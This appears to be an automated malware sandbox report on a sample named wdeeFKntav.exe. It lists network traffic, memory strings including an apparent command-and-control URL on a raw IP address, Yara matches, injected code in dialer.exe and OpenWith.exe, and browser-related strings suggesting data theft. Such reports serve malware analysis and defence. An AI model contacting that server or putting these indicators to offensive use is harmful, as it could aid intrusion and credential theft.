HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:25 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:32 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:39 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:45 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:51 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:58 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:17:04 GMTContent-Length: 166Connection: close |
Source: dialer.exe, 00000002.00000002.2240294940.00000000026EC000.00000004.00000010.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2352844205.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318168734.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2338132971.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2336471326.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2329383412.0000025B16E39000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2339567729.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2287231565.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3332371531.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319262155.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2324301600.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2327778333.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319977059.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2353100598.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9 |
Source: dialer.exe, 00000002.00000002.2241516364.0000000004D2F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9kernelbasentdllkernel32GetProcessMitigationPolicyH |
Source: OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2352844205.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318168734.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2338132971.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2336471326.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2329383412.0000025B16E39000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2339567729.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2287231565.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3332371531.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319262155.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2324301600.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2327778333.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319977059.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2353100598.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9x |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: OpenWith.exe, 00000003.00000003.2338930584.0000025B17012000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://discord.com |
Source: OpenWith.exe, 00000003.00000003.2338930584.0000025B17012000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://discordapp.com |
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: unknown |
Network traffic detected: HTTP traffic on port 49708 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49722 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49710 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49699 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49721 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49720 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49719 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49720 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49722 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49719 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49718 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49713 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49717 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49715 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49716 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49715 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49717 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49714 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49713 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49711 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49709 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49699 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49707 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49711 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49721 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49723 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49709 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49708 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49707 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49716 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49714 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49718 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49723 |
Source: Yara match |
File source: 0.3.wdeeFKntav.exe.45c0000.6.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.dialer.exe.4fd0000.7.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.dialer.exe.4db0000.6.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.3.wdeeFKntav.exe.47e0000.7.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.dialer.exe.4fd0000.7.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.3.wdeeFKntav.exe.47e0000.7.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.3.wdeeFKntav.exe.45c0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.3.wdeeFKntav.exe.45c0000.6.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: wdeeFKntav.exe PID: 5804, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: dialer.exe PID: 3544, type: MEMORYSTR |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B168230C7 RtlAllocateHeap,RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor, |
3_3_0000025B168230C7 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_0000025B14E215AC NtAcceptConnectPort, |
3_2_0000025B14E215AC |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_0000025B14E20AC8 NtAcceptConnectPort,NtAcceptConnectPort, |
3_2_0000025B14E20AC8 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_0000025B14E21CD0 RtlAllocateHeap,NtAcceptConnectPort,FindCloseChangeNotification, |
3_2_0000025B14E21CD0 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_0000025B14E21A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, |
3_2_0000025B14E21A90 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F059F40 NtAcceptConnectPort, |
3_2_00007DF41F059F40 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F058D94 NtAcceptConnectPort, |
3_2_00007DF41F058D94 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F058C90 NtAcceptConnectPort, |
3_2_00007DF41F058C90 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F059CA0 _calloc_dbg,NtAcceptConnectPort, |
3_2_00007DF41F059CA0 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F058C08 NtAcceptConnectPort, |
3_2_00007DF41F058C08 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F059AF4 _malloc_dbg,RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,??3@YAXPEAX@Z, |
3_2_00007DF41F059AF4 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F058AFC NtAcceptConnectPort, |
3_2_00007DF41F058AFC |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F058A40 NtAcceptConnectPort, |
3_2_00007DF41F058A40 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F05A600 NtAcceptConnectPort, |
3_2_00007DF41F05A600 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F05A540 NtAcceptConnectPort, |
3_2_00007DF41F05A540 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F05A2B0 NtAcceptConnectPort, |
3_2_00007DF41F05A2B0 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_2_00CC0AA0 |
0_2_00CC0AA0 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B16825E7C |
3_3_0000025B16825E7C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B1682557C |
3_3_0000025B1682557C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B168258FC |
3_3_0000025B168258FC |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B1682279C |
3_3_0000025B1682279C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B16821BA6 |
3_3_0000025B16821BA6 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B16824A38 |
3_3_0000025B16824A38 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B16822C3C |
3_3_0000025B16822C3C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B168224F7 |
3_3_0000025B168224F7 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_0000025B14E20C5C |
3_2_0000025B14E20C5C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F045BD8 |
3_2_00007DF41F045BD8 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F04BEC4 |
3_2_00007DF41F04BEC4 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F07CEC4 |
3_2_00007DF41F07CEC4 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F0A6F20 |
3_2_00007DF41F0A6F20 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F11CF3C |
3_2_00007DF41F11CF3C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F113DE0 |
3_2_00007DF41F113DE0 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F089E68 |
3_2_00007DF41F089E68 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F117CF4 |
3_2_00007DF41F117CF4 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F088BE8 |
3_2_00007DF41F088BE8 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F031BFC |
3_2_00007DF41F031BFC |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F040C44 |
3_2_00007DF41F040C44 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F05EC44 |
3_2_00007DF41F05EC44 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F096B20 |
3_2_00007DF41F096B20 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F08A9C4 |
3_2_00007DF41F08A9C4 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F096A10 |
3_2_00007DF41F096A10 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F034A14 |
3_2_00007DF41F034A14 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F084A14 |
3_2_00007DF41F084A14 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F1158AC |
3_2_00007DF41F1158AC |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F1178D8 |
3_2_00007DF41F1178D8 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F07F954 |
3_2_00007DF41F07F954 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F0577A0 |
3_2_00007DF41F0577A0 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F0717C4 |
3_2_00007DF41F0717C4 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F07C7E8 |
3_2_00007DF41F07C7E8 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F10780C |
3_2_00007DF41F10780C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F04D850 |
3_2_00007DF41F04D850 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F096834 |
3_2_00007DF41F096834 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F087860 |
3_2_00007DF41F087860 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F04D688 |
3_2_00007DF41F04D688 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F0CB68C |
3_2_00007DF41F0CB68C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F1246F8 |
3_2_00007DF41F1246F8 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F118750 |
3_2_00007DF41F118750 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F09F4FC |
3_2_00007DF41F09F4FC |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F088534 |
3_2_00007DF41F088534 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F1173A0 |
3_2_00007DF41F1173A0 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F1183B8 |
3_2_00007DF41F1183B8 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F0AA3F4 |
3_2_00007DF41F0AA3F4 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F03E414 |
3_2_00007DF41F03E414 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F07C45C |
3_2_00007DF41F07C45C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F067318 |
3_2_00007DF41F067318 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F043314 |
3_2_00007DF41F043314 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F1241DC |
3_2_00007DF41F1241DC |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F1111BC |
3_2_00007DF41F1111BC |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F07D210 |
3_2_00007DF41F07D210 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F118238 |
3_2_00007DF41F118238 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F0D40A0 |
3_2_00007DF41F0D40A0 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F09B094 |
3_2_00007DF41F09B094 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F096F78 |
3_2_00007DF41F096F78 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F086FA0 |
3_2_00007DF41F086FA0 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F10C01C |
3_2_00007DF41F10C01C |
Source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000046E3000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameKernelbase.dllj% vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2112870082.0000000004652000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenamekernel32j% vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000000.2073258965.0000000000CDB000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameTCPZ.exe, vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2112932104.0000000004730000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenamekernel32j% vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2113264458.00000000049C1000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameKernelbase.dllj% vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2112323721.0000000004936000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2111775317.0000000004738000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2112684749.000000000488D000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe |
Source: wdeeFKntav.exe |
Binary or memory string: OriginalFilenameTCPZ.exe, vs wdeeFKntav.exe |
Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence'; |
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q); |
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp |
